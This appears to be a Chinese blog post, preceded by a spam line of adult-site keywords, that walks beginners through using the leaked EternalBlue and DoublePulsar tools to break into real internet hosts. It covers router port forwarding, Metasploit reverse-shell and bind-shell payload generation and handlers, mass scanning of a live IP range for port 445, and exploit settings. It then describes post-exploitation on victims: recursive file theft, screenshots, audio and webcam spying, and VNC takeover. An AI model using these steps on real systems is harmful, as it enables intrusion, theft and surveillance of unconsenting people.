一区在线电影,国产在线首页,中文字幕精,天天爽天天射,夜色99,日韩国产成人av,伊人久久综合视频

威勢網(wǎng)絡,為您的企業(yè)和團隊注入互聯(lián)網(wǎng)活力!
服務熱線:138-9741-0341

[原創(chuàng)]NASA方程式黑客工具包之初償鮮

發(fā)布日期:2017/5/21 作者:LG 瀏覽:1276
---永恒之藍實戰(zhàn)篇
前言:
        很早就拿到這個工具包了,興奮之余馬上去測試,但是由于一直沒有合適的實驗環(huán)境,加上工具發(fā)布了兩個版本,而我拿到的是最早的版本,這個版本有一個命令是無法運行的,所以測試工作一直未能進行下去,加上工作忙,沒有太多時間研究,就這樣過了好多天,后來比特病毒發(fā)作,同學找我?guī)兔Γ肿屛襾砹伺d趣,又重新下載了新版本,于是才有了這往篇日志,回過頭一看,其實這個缺少的命令對實驗環(huán)境是沒有什么太大的影響的,研究了一個晚上(半夜兩點了),NC各種調(diào)試,才算搞明白了一點永恒之藍的使用方式,實在是太菜了...
        安裝好工具包以后,進入WINDOWS目錄,注意是工具包的WINDOWS目錄,而不是系統(tǒng)的,有個START.JAR文件,還有個fb.py文件,我最開始以為FB.PY溢出工具會返回到START.JAR運行后的danderspritz平臺上面,所以花了太多的時間都沒有成功(其實到現(xiàn)在我也沒搞清楚能不能返回到這個平臺上面,我覺得應該是可以的,留給后面再研究吧)太多工作等待我去做了,今天講的是fb.py這個腳本工具的利用,配合永恒之藍漏洞,在互聯(lián)網(wǎng)實戰(zhàn)環(huán)境下面抓肉機,也有可能別人早就有了這樣的文章,但是我覺得還是有必要把一些基礎的信息和需要注意的細節(jié)問題給寫出來,方便新人測試!畢竟實驗環(huán)境不同于實戰(zhàn)環(huán)境,會遇到各種問題,對于新手來說,一個小小的細節(jié)就可能導致入侵的失??!

一、準備階段
        所需要的工具:
            NASA武器庫壓縮包
            python2.6 pywin32  
            NC.EXE
            KALI  LINUX  (要用到里面的美少婦生成DLL文件)
            S.EXE (一款優(yōu)秀的掃描器,非必須,也可用KALI namp代替)
        安裝步驟這些就不談了,我們先大概了解一下網(wǎng)絡環(huán)境,這篇完全是照顧菜鳥的,大牛飄過,直接看實戰(zhàn)階段!
        先給大家說明一點,永恒之藍是通過445端口進行攻擊的,所以我們要掃描互聯(lián)網(wǎng)環(huán)境下主機的這一端口,而現(xiàn)在運營商為了防治網(wǎng)絡攻擊,好多IP段的445端口是被封的,即便主機開放了端口,那你還是掃描不到任何信息的!據(jù)我了解,端口屏蔽狀況根據(jù)不同地區(qū)而有所不同,也會因為運營商的不同而不同!
        聽到這里,好多人便失去了信心,端口都掃描不到,那還玩?zhèn)€屁啊!但是幸運的是,事情沒有那么絕對!很多上網(wǎng)用戶是家庭撥號上網(wǎng)的,也就是PPPOE協(xié)議撥號上去的,運營商會暫時分配一個互聯(lián)網(wǎng)真實IP給用戶,對于這樣的用戶來說,可玩性還是很高的!而更多的用戶是光纖上網(wǎng),撥號成功以后進路由器看到的IP和www.ip138.com上面看到的實際IP是不同的,這樣的用戶就有點郁悶了~就像我辦公室就是這樣的環(huán)境,后者的網(wǎng)絡環(huán)境最郁悶的地放就是沒法用反彈?。ɑㄉ鷼し磸検强梢越鉀Q這個問題的,不在此文描述?。?br />         啰嗦了這么多,慢慢進入正題吧!
        想要入侵,總該 有個目標吧!所以我們先要知道自己的IP地址,注意,這個地址不是你的局域網(wǎng)的地址,而是互聯(lián)網(wǎng)的真實地址!打開www.ip138.com網(wǎng)站,看到的IP就是自己的真實IP!
        比如,我在青海,看到的IP地址是:
    139.170.66.3
(網(wǎng)警同志,別對號入座哦,我馬賽克過的,一陣奸笑。。。)
  到這里,我覺得有必要向大家對我的網(wǎng)絡環(huán)境做一個簡單介紹!我是青海的聯(lián)通用戶,家里是TPLINK無線路由設置為自動撥號上網(wǎng)的,電腦通過網(wǎng)絡接到網(wǎng)線路由器上,手機通過WIFI接入路由器,當然手機與我們今天的實戰(zhàn)沒有任何關(guān)聯(lián),只是用來描述網(wǎng)絡結(jié)構(gòu)的。我們把NASA工具包運行的電腦叫做攻擊機吧!受攻擊的互聯(lián)網(wǎng)電腦叫靶機。
===============================================================================
攻擊機:
操作系統(tǒng):WIN10 Pro
外網(wǎng)IP無:
內(nèi)網(wǎng)IP:192.168.1.5、192.168.1.15、192.168.172.1...(好幾個,不一一貼了,這些都叫保留地址IP)
KALI linux:192.168.1.102
路由器IP: 139.170.66.3 //此IP為真實互聯(lián)網(wǎng)IP
手機1:192.168.1.101 
手機2:192.168.1.103 
===============================================================================
 
  可見,我的攻擊擊WIN10是沒有真實的互聯(lián)網(wǎng)IP的,而如果我們溢出成功,讓靶機反彈連接到我們的攻擊機上的時候,我們必須在攻擊機開放一個端口讓靶機連接進來,除此之外,我們還要告訴靶機讓它返彈到哪臺主機上面,也就是讓告訴靶機反彈的IP和端口信息,這個IP一定要是真實的互聯(lián)網(wǎng)IP,所以應該是  139.170.66.3 ,而不是 192.168.1.5 !當然這個192.168.1.5地址我們還是有用的,下面會說到!我們再簡單的理一下攻擊的數(shù)據(jù)包流向,讓菜鳥理解這個過程,有助于后面的網(wǎng)絡調(diào)試!整個攻擊過程是這樣的:

第一步:攻擊機192.168.1.5發(fā)出攻擊指令,此指令為向外發(fā)出的數(shù)據(jù)包,最終要到靶機的445端口
第二步:靶機收到數(shù)據(jù)包,數(shù)據(jù)包中有攻擊機發(fā)出的攻擊載荷(payload),載荷中包含攻擊機的真實IP和端口信息
第三步:載荷在肉機上執(zhí)行,并成功溢出,肉機操作系統(tǒng)將自己的權(quán)限發(fā)送到第二步中得到的IP和端口上去主動找虐。所以這里的IP肯定是 139.170.66.3,而不是192.168.1.5.
第四步:受虐數(shù)據(jù)庫從肉機發(fā)送到 139.170.66.3上,而此IP為 路由器,并非攻擊機電腦,所以我們要將這個受虐數(shù)據(jù)包轉(zhuǎn)發(fā)到黑客操作的電腦上才行,而不是被路由器擋在門外!所以我們的
第五步:將路由器的收到的數(shù)據(jù)包轉(zhuǎn)發(fā)到攻擊機的內(nèi)網(wǎng)IP上。
  整個過程中,數(shù)據(jù)包從里向外是怎么出去的不重要,反正都會到達受害肉機上,但是最關(guān)鍵的是從靶機,也就是肉機返回來的結(jié)果信息一定要到達攻擊者的電腦上,而不應該被任何網(wǎng)絡堵塞掉,這就是我啰嗦了這么一堆去描述網(wǎng)絡環(huán)境的原因所在!

  OK,知道了這些,我們先來設置一下路由,在路由上做一個端口轉(zhuǎn)發(fā),將 139.170.66.3的某一個端口轉(zhuǎn)發(fā)到攻擊機192.168.1.15的某個端口上過來!這樣就保證攻擊機能正常接受到肉機發(fā)送過來的反彈數(shù)據(jù)包。一般來說,低端端口被封鎖的可能性大,所以我們在這里盡量采用一些特殊端口,如21、80、443、53、1433、3306、3389之類的端口,因為這些端口為常用協(xié)議端口,所以被封的可能性相對小一些!其中80端口在肉機上反彈的時候突破防火墻的可能性很高!但是一般家庭撥號上網(wǎng)用戶80端口被封掉的可能性也是很大的!我是用的3389端口,
  我們進自己的路由器,設置一個端口轉(zhuǎn)發(fā)!
 在路由器中左邊找到轉(zhuǎn)發(fā)規(guī)則,在右邊添加一個轉(zhuǎn)發(fā),如下圖:



大家看了圖免不了要問,不是要轉(zhuǎn)發(fā)139.170.66.3的3389端口到192.168.1.5的3389上面嗎?怎么是192.168.1.102? 原因是這樣的,因為1.5是我的WIN10,NASA工具包運行在上面,當攻擊成功后肉機發(fā)送反彈數(shù)據(jù)包過來,先到路由 139.170.66.3上面,路由器發(fā)現(xiàn)數(shù)據(jù)是要找3389端口的,這個數(shù)據(jù)包應該被接收反彈的應用捕獲才對,也就是說,由我們的KALI 里面的美少婦MSF捕獲才對,而我的KALI的IP為102,所以我們將3389轉(zhuǎn)發(fā)到102上面,整個過程就是WIN10攻擊機只負責發(fā)送數(shù)據(jù)包溢出,溢出成功后肉機反回來的數(shù)據(jù)包由192.168.1.102 KALI MSF接管。希望沒把大家繞糊涂!

  OK, 設置好路由端口轉(zhuǎn)發(fā)以后,我們先來測試一下端口是否暢通無阻!這一點很重要!不然很難保后面能否成功!


我們進入KALI,在終端上運行命令
NC -L -V -P 3389
如上圖,在192.168.1.102上面監(jiān)聽個3389端口。 然后我們找個朋友,把自己的實際IP告訴朋友,讓它在CMD下面運行:
telnet   139.170.66.3 3389 

注意,IP換成自己的外網(wǎng)IP。xp\2003才支持telnet命令。如果是其它版本,請自己COPY一個TELNET.EXE到系統(tǒng)中也可以運行的。

如果朋友看到上面的界面,基本上說明網(wǎng)是沒問題的。同時,當朋友連上來的時候,我們會在KALI里面看到有數(shù)據(jù)包進入,如下圖



這時候其實你還可以在此窗口中隨便打幾個這了,就可以互相發(fā)送給對方窗口中了,更加證明網(wǎng)絡暢通無阻,如下圖所示

因為朋友運行的命令是 telnet  139.170.66.3 3389 ,后面的3389是端口號,而我們在本機KALI內(nèi)網(wǎng)環(huán)境下192.168.1.102 的3389能正常接收到數(shù)據(jù)包,這就說明網(wǎng)絡是沒有問題了,我們可以進行下一步操作了。如果這一步有問題,那我們就換個端口測試,一定要把端口調(diào)試通,找到一個沒有被運營商封鎖的端口。如果這一步?jīng)]有問題了,那么就已經(jīng)成功了一半了!
我們在KALI 終端窗口下用組合鍵 CTR + C 終止當前NC端口監(jiān)聽。開始配置我們的反彈客戶端。
進入美少婦,我們用到的兩個載荷為:
payload/windows/x64/meterpreter/reverse_tcp 
payload/windows/meterpreter/reverse_tcp  

這兩個載荷分別是64位平臺和32位平臺的,參照上圖,設置兩個參數(shù) ,SET LHOST XXX.XXX.XXX.XXX ,這里用自己的IP來代替,我是用的花生殼域名代替的,端口設置為3389.然后生成
generate -f my3389_x64.dll -t dll
  同樣再生成一個32位平臺的!注意,32位平臺的建議用其它端口,不要再用3389端口,因為會引起上線沖突,所以我生成了一個 my21_x86.dll文件。這兩個文件一個是用來上線64位平臺的,一個是用來上線32位平臺的。
我生成的DLL如下圖所示

我生成的比較多,大家只需要生成DLL格式的即可。
   做完這步,我們就可以在KALI中進入 metasploit平臺,打開端口監(jiān)聽了,命令如下:
 

use exploit/multi/handler       //使用監(jiān)聽模塊
set payload windows/x64/meterpreter/reverse_tcp  //設置payload
set LHOST 192.168.1.102       //設置本地IP
set LPORT 3389         //設置本地端口

再用命令 exploit -j -z 開始監(jiān)聽。如下圖表示已經(jīng)開始監(jiān)聽

同樣的方法再設置一個X86平臺的監(jiān)聽端口在21上面,同時別忘記端口轉(zhuǎn)發(fā)。注意X86平臺不能用X64的載荷,包括生成和監(jiān)聽!
設置監(jiān)聽完成以后最后再去讓朋友連接測試一下,保證數(shù)據(jù)的暢通!





如果路由端口映射沒問題,KALI監(jiān)聽沒問題,朋友在遠端自己家里telnet 你的ip 3389 以后應該可以看到CMD窗口中大量數(shù)據(jù)流滾動的效果(黑客帝國有木有?),這時候說明前面的步驟全成功了!
  還記得前面看到的IP地址嗎? 139.170.66.3 ,我們掃描的關(guān)鍵就是設置合理的IP段。我們將IP范圍定位在此段前后,數(shù)量大小由自己控制,我設置為 139.170.20.1-139.170.200.1 ,注意,將IP第三段設置一個跨度,以保證有足夠的主機數(shù)量,如果IP段跨度太大,端口往往是被封的。然后用掃描器進行大范圍端口掃描。用什么掃描器看個人喜歡了。下面是我用S.EXE掃描的結(jié)果。

S.EXE是一款小巧又強大的掃描器速度極快!開了200線程,
Scan 39937 IPs Complete In 0 Hours 9 Minutes 57 Seconds. Found 46 Hosts。
9分鐘掃到了46臺開放端口的主機,看來還是戰(zhàn)果豐厚。開放掃描完成后它會將結(jié)果保存到RESULT.TXT文件中。

嘰歪了半天,終于進入主題了,看官們肯定早就準備扔鞋子了..... 

二、實戰(zhàn)階段

在攻擊機上運行攻擊腳本fb.py,我就不抓圖了,關(guān)鍵參數(shù)如下: 

[?] Default Target IP Address [] : 139.170.88.88   //靶機的IP,是馬賽克過后的IP
[?] Default Callback IP Address [] : 139.170.66.3  //自己的IP,也是馬賽克過后的
[?] Use Redirection [yes] : no  //重定向關(guān)掉
其它的默認設置就好了,基礎信息設置完成以后用USE命令加載永恒之藍模塊
 在FB環(huán)境中輸入USE命令 然后TAB鍵就可以檢索命令。
fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => XXX.XXX.XXX.XXX 目的IP
目的端口數(shù)寫445,
 其它參數(shù)一路默認,到這一項的時候
[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
默認選擇1,因為我搞定的全是WIN7系統(tǒng)的,XP也可以,03沒成功過。
   

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

到上面的這一步時,也應該選擇1,讓攻擊結(jié)果返回到FB中,一路回車,信息確認無誤后WIN10向靶機發(fā)出攻擊數(shù)據(jù)包,我們看到如下界面


見到上面的成功提示信息,我們再用下一個模塊,從返回信息可以看到是64位平臺的WIN7操作系統(tǒng)。
輸入 :USE Doublepulsar

輸入攻擊靶機IP和本機的IP地址,一路回車,再到如下這個界面的時候

我們選擇2,指定我們一開始配置好的my3389_x64.dll進行上傳,提交執(zhí)行,如果是X86平臺的話,則指定 my21_x86.dll,然后一路默認信息提示,執(zhí)行,當看到運行成功的信息以后,我們在KALI里面看到有SHELL已經(jīng)返彈回來了,然后盡情的開始虐待吧,

進入SHELL,偷看一下肉機上的文件,奶奶的,中文全亂碼了!如果想偷取文件的話用EXIT退出SHELL,回到meterpreter提示符下用
download  d:\mypic\ -r 進行目錄遞歸式下載,如果僅想下一個文件的話,直接指定文件目錄下載。下圖是肉機上的文件及目錄 

抓個屏、再偷聽一下聲音,偷窺一下攝像頭!


打開攝像頭一看,不是美女,所以再換一臺吧!如上圖wQiBClgm.jpeg是攝像頭抓圖,涂抹了一下而矣,被人家看到總是不好的嘛!當然也可以抓取視頻流,我就不做演示了。如果想遠程控制對方電腦,則在meterpreter提示符下輸入:
run vnc 
即可將VNC上傳到對方電腦上,實際應用中往往會被殺軟干掉的,成功率也不是很高。
    上面只是說了一下第一種網(wǎng)絡環(huán)境下的入侵,也就是在自己擁有獨立真實IP環(huán)境下是如何入侵的, 再說一下如果自己沒有真實的IP地址,那們我們又該如何入侵?
     其實和上面的過程差不多,只不過我們換一個攻擊載荷就可以了,還記得我們前面生成的DLL文件 my3389_x64.dll、my21_x86.dll嗎?這兩個文件一個是64位平臺的,一個是32位平臺的,當溢出攻擊成功以后,們們會注入到遠程操作系統(tǒng)的進程中來執(zhí)行反彈SHELL代碼,現(xiàn)在我們既然沒有真實的IP環(huán)境,也就不需要反彈了,所以我們直接在溢出成功后讓主機打開一個端口監(jiān)聽,等待我們?nèi)ミB接即可!這樣的話,我們有沒有真實IP就無關(guān)緊要了!
我們用到載荷:

64位平臺的:   payload/windows/x64/shell/bind_tcp  或   payload/windows/x64/shell_bind_tcp   
X86平臺的:      windows/shell/bind_tcp                     或    windows/shell_bind_tcp       

其實用什么載荷,完全是出自于大家自己喜歡!沒有強行的要求,只要沒有超過攻擊程序限定大小即可!我們就以上面的為例吧!
注意,上面每個平臺的我都給出了兩種載荷(payload),比如64位的來說明吧,有 payload/windows/x64/shell/bind_tcp  和   payload/windows/x64/shell_bind_tcp ,我們分別叫做 64位A和64位B吧!如果用的A載荷,那么溢出成功以后必須要用MSF去連,如果是B載荷的話,用NC.EXE就可以,當然MSF也是沒問題的。連上去以后直接會看到對方主機的SHELL返回信息。至于實戰(zhàn)的時候選擇哪種載荷,完全是看個人喜歡了。。。

==實戰(zhàn)篇完==
 

 ---danderspritz后門篇

初償 danderspritz ,客戶端配置,生成的EXE支持私鑰簽名,時間戳,直接免殺,支持觸發(fā)監(jiān)聽,觸發(fā)反彈,比美少婦強大的多了,隱蔽性更強!有時間再寫


下拉加載更多評論
最新評論
暫無!